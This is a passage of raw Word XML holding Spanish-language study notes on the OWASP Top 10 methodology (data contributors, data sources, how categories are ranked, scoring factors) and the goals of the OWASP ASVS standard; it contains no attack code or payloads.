    <w:p w14:paraId="17F7F922" w14:textId="39BC3CD8" w:rsidR="00B13BE3" w:rsidRPr="00BA754D" w:rsidRDefault="00B13BE3" w:rsidP="00986EC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA754D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>OWASP (TOP10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E83824" w14:textId="5AC69EA0" w:rsidR="00882B11" w:rsidRDefault="00882B11" w:rsidP="00986EC5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A5028">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Lista de </w:t>
      </w:r>
      <w:r w:rsidR="009A5028" w:rsidRPr="009A5028">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>técnicas</w:t>
      </w:r>
      <w:r w:rsidRPr="009A5028">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de seguridad que deberían ser consideradas </w:t>
      </w:r>
      <w:r w:rsidR="009A5028" w:rsidRPr="009A5028">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para cada desarrollo de proyecto. Escrito por desarrolladores. Una de sus principales ventajas es la de proveer una guía practica que ayude a los desarrolladores a hacer mas seguras sus aplicaciones. Estas técnicas deben ser empleadas en etapas tempranas del desarrollo para así obtener una mayor eficiencia. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A84FE81" w14:textId="77777777" w:rsidR="009A5028" w:rsidRDefault="009A5028" w:rsidP="00986EC5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61392814" w14:textId="77777777" w:rsidR="009A5028" w:rsidRDefault="009A5028" w:rsidP="00986EC5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B850E11" w14:textId="77777777" w:rsidR="009A5028" w:rsidRDefault="009A5028" w:rsidP="00986EC5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBA4C99" w14:textId="77777777" w:rsidR="009A5028" w:rsidRPr="009A5028" w:rsidRDefault="009A5028" w:rsidP="00986EC5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA07B54" w14:textId="77777777" w:rsidR="00986EC5" w:rsidRDefault="00B13BE3" w:rsidP="00986EC5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00986EC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proveedores de datos:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13BE3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="864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2329"/>
        <w:gridCol w:w="2252"/>
        <w:gridCol w:w="2137"/>
      </w:tblGrid>
      <w:tr w:rsidR="00986EC5" w14:paraId="06CA2D7A" w14:textId="77777777" w:rsidTr="00986EC5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="358F0CBE" w14:textId="16ABD76F" w:rsidR="00986EC5" w:rsidRDefault="00986EC5" w:rsidP="00986EC5">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>AppSec Labs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BE8A2E0" w14:textId="567EF5C1" w:rsidR="00986EC5" w:rsidRDefault="00986EC5" w:rsidP="00986EC5">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Cobalt.io</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2419" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36BD3AA6" w14:textId="567E17B3" w:rsidR="00986EC5" w:rsidRDefault="00986EC5" w:rsidP="00986EC5">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Contrast Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="147FD2E4" w14:textId="677330F6" w:rsidR="00986EC5" w:rsidRDefault="00986EC5" w:rsidP="00986EC5">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Gitlab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00986EC5" w14:paraId="52B095C2" w14:textId="77777777" w:rsidTr="00986EC5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="153F6116" w14:textId="0EED0572" w:rsidR="00986EC5" w:rsidRDefault="00986EC5" w:rsidP="00986EC5">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>HackerOne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B7C5293" w14:textId="4CF3CF33" w:rsidR="00986EC5" w:rsidRDefault="00986EC5" w:rsidP="00986EC5">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>HCL Technologies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2419" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B78931E" w14:textId="726EA73A" w:rsidR="00986EC5" w:rsidRDefault="00986EC5" w:rsidP="00986EC5">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Micro Focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BB0A4D6" w14:textId="79BDAFE6" w:rsidR="00986EC5" w:rsidRDefault="00986EC5" w:rsidP="00986EC5">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Pen Test-Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00986EC5" w14:paraId="4AF6DA41" w14:textId="77777777" w:rsidTr="00986EC5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B6E2285" w14:textId="173A15D5" w:rsidR="00986EC5" w:rsidRDefault="00986EC5" w:rsidP="00986EC5">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Probely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B2F2980" w14:textId="16EB282F" w:rsidR="00986EC5" w:rsidRDefault="00986EC5" w:rsidP="00986EC5">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Sqreen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2419" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B57DD87" w14:textId="42143D97" w:rsidR="00986EC5" w:rsidRDefault="00986EC5" w:rsidP="00986EC5">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Veracode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04DA6F92" w14:textId="1CF1300E" w:rsidR="00986EC5" w:rsidRDefault="00986EC5" w:rsidP="00986EC5">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>WhiteHat (NTT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34802525" w14:textId="77777777" w:rsidR="00986EC5" w:rsidRDefault="001C0B45" w:rsidP="00986EC5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986EC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Principales fuentes de datos</w:t>
      </w:r>
      <w:r w:rsidRPr="00986EC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F7CCB0" w14:textId="77777777" w:rsidR="00986EC5" w:rsidRDefault="0079276A" w:rsidP="00986EC5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986EC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Herramientas asistidas</w:t>
      </w:r>
      <w:r w:rsidR="001C0B45" w:rsidRPr="00986EC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por Humanos (HaT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A467BF" w14:textId="77777777" w:rsidR="00986EC5" w:rsidRDefault="001C0B45" w:rsidP="00986EC5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986EC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Humano asistido por Herramientas (TaH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7A5B6A" w14:textId="10E808C0" w:rsidR="001C0B45" w:rsidRPr="00986EC5" w:rsidRDefault="001C0B45" w:rsidP="00986EC5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986EC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Herramientas en bruto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3711F0BD" w14:textId="77777777" w:rsidR="001C0B45" w:rsidRDefault="001C0B45" w:rsidP="00986EC5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tasa de incidencia:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> porcentaje de población de aplicaciones que tienen al menos una instancia de un tipo de vulnerabilidad. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464D469F" w14:textId="541C774B" w:rsidR="001C0B45" w:rsidRDefault="001C0B45" w:rsidP="00986EC5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F842F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">¿Como se arma el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F842F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>TopTen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F842F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="00F842F7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED3325">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se analizan las 8 categorías con más tasa de incidencia, luego </w:t>
      </w:r>
      <w:r w:rsidR="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se evaluaron los resultados de la encuesta para ver cuales ya se encuentra presente</w:t>
      </w:r>
      <w:r w:rsidR="00ED3325">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED3325">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">s dos más votados que no están presentes </w:t>
      </w:r>
      <w:r w:rsidR="00ED3325">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>serán</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> seleccionadas para los otros dos puestos del Top 10. Luego se determinan los factores explotabilidad e impacto y luego se procede a ordenarlas en función del riesgo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B7F3D6" w14:textId="77777777" w:rsidR="00986EC5" w:rsidRPr="00986EC5" w:rsidRDefault="001C0B45" w:rsidP="00986EC5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986EC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Factores de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E75A5A8" w14:textId="2B8B0946" w:rsidR="00986EC5" w:rsidRDefault="001C0B45" w:rsidP="00986EC5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986EC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CWEs mapeados</w:t>
      </w:r>
      <w:r w:rsidR="00986EC5" w:rsidRPr="00986EC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00986EC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Numero de CWEs asignadas a una categoría</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F99A7C1" w14:textId="77777777" w:rsidR="00986EC5" w:rsidRPr="00986EC5" w:rsidRDefault="001C0B45" w:rsidP="00986EC5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986EC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tasa de incidencia</w:t>
      </w:r>
      <w:r w:rsidR="00986EC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00986EC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Porcentajes de aplicaciones vulnerables a esa CWE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA3AD4F" w14:textId="6A9BC1A6" w:rsidR="00F842F7" w:rsidRPr="00986EC5" w:rsidRDefault="001C0B45" w:rsidP="00986EC5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986EC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cobertura</w:t>
      </w:r>
      <w:r w:rsidR="00986EC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00986EC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Porcentaje de aplicaciones que han sido testeadas para determinar la CWE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304EE49" w14:textId="66F05F1F" w:rsidR="00986EC5" w:rsidRPr="000E77E4" w:rsidRDefault="00986EC5" w:rsidP="00986EC5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Explotabilidad Ponderada: </w:t>
      </w:r>
      <w:r w:rsidR="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sub-puntuacion de explotabilidad de las puntuaciones CVSSv2 y CVSSv3 asignadas a las CVEs mapeadas a las CWEs, normalizados y colocados en la escala de 10 puntos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0F1489" w14:textId="4E54A4A6" w:rsidR="000E77E4" w:rsidRPr="000E77E4" w:rsidRDefault="000E77E4" w:rsidP="00986EC5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto Ponderado: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sub-puntuacion de impacto de las puntuaciones CVSSv2 y CVSSv3 asignadas a las CVEs mapeadas a las CWEs, normalizados y colocados en la escala de 10 puntos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36370DAF" w14:textId="36562BF0" w:rsidR="000E77E4" w:rsidRPr="000E77E4" w:rsidRDefault="000E77E4" w:rsidP="00986EC5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Total</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Ocurrencias: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Numero total de aplicaciones en las que se encontraron CWEs asignados a una categoría</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B115D36" w14:textId="77777777" w:rsidR="000E77E4" w:rsidRPr="000E77E4" w:rsidRDefault="000E77E4" w:rsidP="004C318E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Total</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de CVEs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Numero total de CVEs en la DB del NVD que fueron asignadas a las CWEs asignados a una categoría</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56697A8E" w14:textId="7FB313F5" w:rsidR="00E133A4" w:rsidRDefault="00E133A4" w:rsidP="000E77E4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E133A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>ASVS (Application Security Verification Standard)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E133A4">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:br/>
        <w:t>Estándar de seguridad de aplicaciones que proporciona u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">na guía exhaustiva para verificar y mejorar la seguridad de las aplicaciones web y móviles. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA754D">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">Desarrollo por la OWASP. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA754D">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E133A4">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Establece lista de requisit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00E133A4">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>s y controles de seguri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">dad que las aplicaciones deben cumplir para protegerse contra diversas vulnerabilidades y ataques comunes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D29F983" w14:textId="77777777" w:rsidR="00E133A4" w:rsidRDefault="00E133A4" w:rsidP="000E77E4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD2ECE5" w14:textId="16C921AC" w:rsidR="00E133A4" w:rsidRDefault="00E133A4" w:rsidP="00E133A4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E133A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Objetivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3331AF68" w14:textId="263D8C06" w:rsidR="00E133A4" w:rsidRPr="00E133A4" w:rsidRDefault="00E133A4" w:rsidP="00E133A4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Ayudar a las organizaciones a desarrollar y mantener aplicaciones seguras</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707A0E83" w14:textId="63D406F1" w:rsidR="00E133A4" w:rsidRPr="00E133A4" w:rsidRDefault="00E133A4" w:rsidP="00E133A4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Permitir que los proveedores de servicios de seguridad, herramientas y los consumidores alineen sus requisitos y ofertas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258FF254" w14:textId="2826A7EF" w:rsidR="00E133A4" w:rsidRDefault="00E133A4" w:rsidP="00E133A4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E133A4">
        <w:rPr>
          <w:b/>
